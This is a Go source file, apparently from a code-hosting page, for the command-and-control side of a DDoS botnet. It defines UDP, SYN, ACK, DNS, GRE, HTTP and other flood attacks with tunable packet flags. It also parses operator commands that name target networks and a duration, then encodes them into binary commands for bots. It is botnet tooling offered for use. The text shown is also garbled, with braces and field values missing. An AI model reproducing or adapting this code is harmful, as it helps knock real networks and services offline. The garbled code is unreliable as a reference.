
367 lines
10 KiB
Raw Permalink Normal View History

2020-05-05 14:29:54 +02:00
package main
import (
type AttackInfo struct {
attackID uint8
attackFlags []uint8
attackDescription string
type Attack struct {
Duration uint32
Type uint8
Targets map[uint32]uint8 // Prefix/netmask
Flags map[uint8]string // key=value
type FlagInfo struct {
flagID uint8
flagDescription string
var flagInfoLookup map[string]FlagInfo = map[string]FlagInfo {
"len": FlagInfo {
"Size of packet data, default is 512 bytes",
"rand": FlagInfo {
"Randomize packet data content, default is 1 (yes)",
"tos": FlagInfo {
"TOS field value in IP header, default is 0",
"ident": FlagInfo {
"ID field value in IP header, default is random",
"ttl": FlagInfo {
"TTL field in IP header, default is 255",
"df": FlagInfo {
"Set the Dont-Fragment bit in IP header, default is 0 (no)",
"sport": FlagInfo {
"Source port, default is random",
"dport": FlagInfo {
"Destination port, default is random",
"domain": FlagInfo {
"Domain name to attack",
"dhid": FlagInfo {
"Domain name transaction ID, default is random",
"urg": FlagInfo {
"Set the URG bit in IP header, default is 0 (no)",
"ack": FlagInfo {
"Set the ACK bit in IP header, default is 0 (no) except for ACK flood",
"psh": FlagInfo {
"Set the PSH bit in IP header, default is 0 (no)",
"rst": FlagInfo {
"Set the RST bit in IP header, default is 0 (no)",
"syn": FlagInfo {
"Set the ACK bit in IP header, default is 0 (no) except for SYN flood",
"fin": FlagInfo {
"Set the FIN bit in IP header, default is 0 (no)",
"seqnum": FlagInfo {
"Sequence number value in TCP header, default is random",
"acknum": FlagInfo {
"Ack number value in TCP header, default is random",
"gcip": FlagInfo {
"Set internal IP to destination ip, default is 0 (no)",
"method": FlagInfo {
"HTTP method name, default is get",
"postdata": FlagInfo {
"POST data, default is empty/none",
"path": FlagInfo {
"HTTP path, default is /",
/*"ssl": FlagInfo {
"conns": FlagInfo {
"Number of connections",
"source": FlagInfo {
"Source IP address, for random",
var attackInfoLookup map[string]AttackInfo = map[string]AttackInfo {
"udp": AttackInfo {
[]uint8 { 2, 3, 4, 0, 1, 5, 6, 7, 25 },
"UDP flood",
"vse": AttackInfo {
[]uint8 { 2, 3, 4, 5, 6, 7 },
"Valve source engine specific flood",
"dns": AttackInfo {
[]uint8 { 2, 3, 4, 5, 6, 7, 8, 9 },
"DNS resolver flood using the targets domain, input IP is ignored",
"syn": AttackInfo {
[]uint8 { 2, 3, 4, 5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18, 25 },
"SYN flood",
"ack": AttackInfo {
[]uint8 { 0, 1, 2, 3, 4, 5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18, 25 },
"ACK flood",
"stomp": AttackInfo {
[]uint8 { 0, 1, 2, 3, 4, 5, 7, 11, 12, 13, 14, 15, 16 },
"TCP stomp flood",
"greip": AttackInfo {
[]uint8 {0, 1, 2, 3, 4, 5, 6, 7, 19, 25},
"GRE IP flood",
"greeth": AttackInfo {
[]uint8 {0, 1, 2, 3, 4, 5, 6, 7, 19, 25},
"GRE Ethernet flood",
"udpplain": AttackInfo {
[]uint8 {0, 1, 7},
"UDP flood with less options. optimized for higher PPS",
"http": AttackInfo {
[]uint8 {8, 7, 20, 21, 22, 24},
"HTTP flood",
func uint8InSlice(a uint8, list []uint8) bool {
for _, b := range list {
if b == a {
return true
return false
func NewAttack(str string, admin int) (*Attack, error) {
atk := &Attack{0, 0, make(map[uint32]uint8), make(map[uint8]string)}
args, _ := shellwords.Parse(str)
var atkInfo AttackInfo
// Parse attack name
if len(args) == 0 {
return nil, errors.New("Must specify an attack name")
} else {
if args[0] == "?" {
validCmdList := "\033[37;1mAvailable attack list\r\n\033[36;1m"
for cmdName, atkInfo := range attackInfoLookup {
validCmdList += cmdName + ": " + atkInfo.attackDescription + "\r\n"
return nil, errors.New(validCmdList)
var exists bool
atkInfo, exists = attackInfoLookup[args[0]]
if !exists {
return nil, errors.New(fmt.Sprintf("\033[33;1m%s \033[31mis not a valid attack!", args[0]))
atk.Type = atkInfo.attackID
args = args[1:]
// Parse targets
if len(args) == 0 {
return nil, errors.New("Must specify prefix/netmask as targets")
} else {
if args[0] == "?" {
return nil, errors.New("\033[37;1mComma delimited list of target prefixes\r\nEx:\r\nEx:\r\nEx:,")
cidrArgs := strings.Split(args[0], ",")
if len(cidrArgs) > 255 {
return nil, errors.New("Cannot specify more than 255 targets in a single attack!")
for _,cidr := range cidrArgs {
prefix := ""
netmask := uint8(32)
cidrInfo := strings.Split(cidr, "/")
if len(cidrInfo) == 0 {
return nil, errors.New("Blank target specified!")
prefix = cidrInfo[0]
if len(cidrInfo) == 2 {
netmaskTmp, err := strconv.Atoi(cidrInfo[1])
if err != nil || netmask > 32 || netmask < 0 {
return nil, errors.New(fmt.Sprintf("Invalid netmask was supplied, near %s", cidr))
netmask = uint8(netmaskTmp)
} else if len(cidrInfo) > 2 {
return nil, errors.New(fmt.Sprintf("Too many /'s in prefix, near %s", cidr))
ip := net.ParseIP(prefix)
if ip == nil {
return nil, errors.New(fmt.Sprintf("Failed to parse IP address, near %s", cidr))
atk.Targets[binary.BigEndian.Uint32(ip[12:])] = netmask
args = args[1:]
// Parse attack duration time
if len(args) == 0 {
return nil, errors.New("Must specify an attack duration")
} else {
if args[0] == "?" {
return nil, errors.New("\033[37;1mDuration of the attack, in seconds")
duration, err := strconv.Atoi(args[0])
if err != nil || duration == 0 || duration > 3600 {
return nil, errors.New(fmt.Sprintf("Invalid attack duration, near %s. Duration must be between 0 and 3600 seconds", args[0]))
atk.Duration = uint32(duration)
args = args[1:]
// Parse flags
for len(args) > 0 {
if args[0] == "?" {
validFlags := "\033[37;1mList of flags key=val seperated by spaces. Valid flags for this method are\r\n\r\n"
for _, flagID := range atkInfo.attackFlags {
for flagName, flagInfo := range flagInfoLookup {
if flagID == flagInfo.flagID {
validFlags += flagName + ": " + flagInfo.flagDescription + "\r\n"
validFlags += "\r\nValue of 65535 for a flag denotes random (for ports, etc)\r\n"
validFlags += "Ex: seq=0\r\nEx: sport=0 dport=65535"
return nil, errors.New(validFlags)
flagSplit := strings.SplitN(args[0], "=", 2)
if len(flagSplit) != 2 {
return nil, errors.New(fmt.Sprintf("Invalid key=value flag combination near %s", args[0]))
flagInfo, exists := flagInfoLookup[flagSplit[0]]
if !exists || !uint8InSlice(flagInfo.flagID, atkInfo.attackFlags) || (admin == 0 && flagInfo.flagID == 25) {
return nil, errors.New(fmt.Sprintf("Invalid flag key %s, near %s", flagSplit[0], args[0]))
if flagSplit[1][0] == '"' {
flagSplit[1] = flagSplit[1][1:len(flagSplit[1]) - 1]
if flagSplit[1] == "true" {
flagSplit[1] = "1"
} else if flagSplit[1] == "false" {
flagSplit[1] = "0"
atk.Flags[uint8(flagInfo.flagID)] = flagSplit[1]
args = args[1:]
if len(atk.Flags) > 255 {
return nil, errors.New("Cannot have more than 255 flags")
return atk, nil
func (this *Attack) Build() ([]byte, error) {
buf := make([]byte, 0)
var tmp []byte
// Add in attack duration
tmp = make([]byte, 4)
binary.BigEndian.PutUint32(tmp, this.Duration)
buf = append(buf, tmp...)
// Add in attack type
buf = append(buf, byte(this.Type))
// Send number of targets
buf = append(buf, byte(len(this.Targets)))
// Send targets
for prefix,netmask := range this.Targets {
tmp = make([]byte, 5)
binary.BigEndian.PutUint32(tmp, prefix)
tmp[4] = byte(netmask)
buf = append(buf, tmp...)
// Send number of flags
buf = append(buf, byte(len(this.Flags)))
// Send flags
for key,val := range this.Flags {
tmp = make([]byte, 2)
tmp[0] = key
strbuf := []byte(val)
if len(strbuf) > 255 {
return nil, errors.New("Flag value cannot be more than 255 bytes!")
tmp[1] = uint8(len(strbuf))
tmp = append(tmp, strbuf...)
buf = append(buf, tmp...)
// Specify the total length
if len(buf) > 4096 {
return nil, errors.New("Max buffer is 4096")
tmp = make([]byte, 2)
binary.BigEndian.PutUint16(tmp, uint16(len(buf) + 2))
buf = append(tmp, buf...)
return buf, nil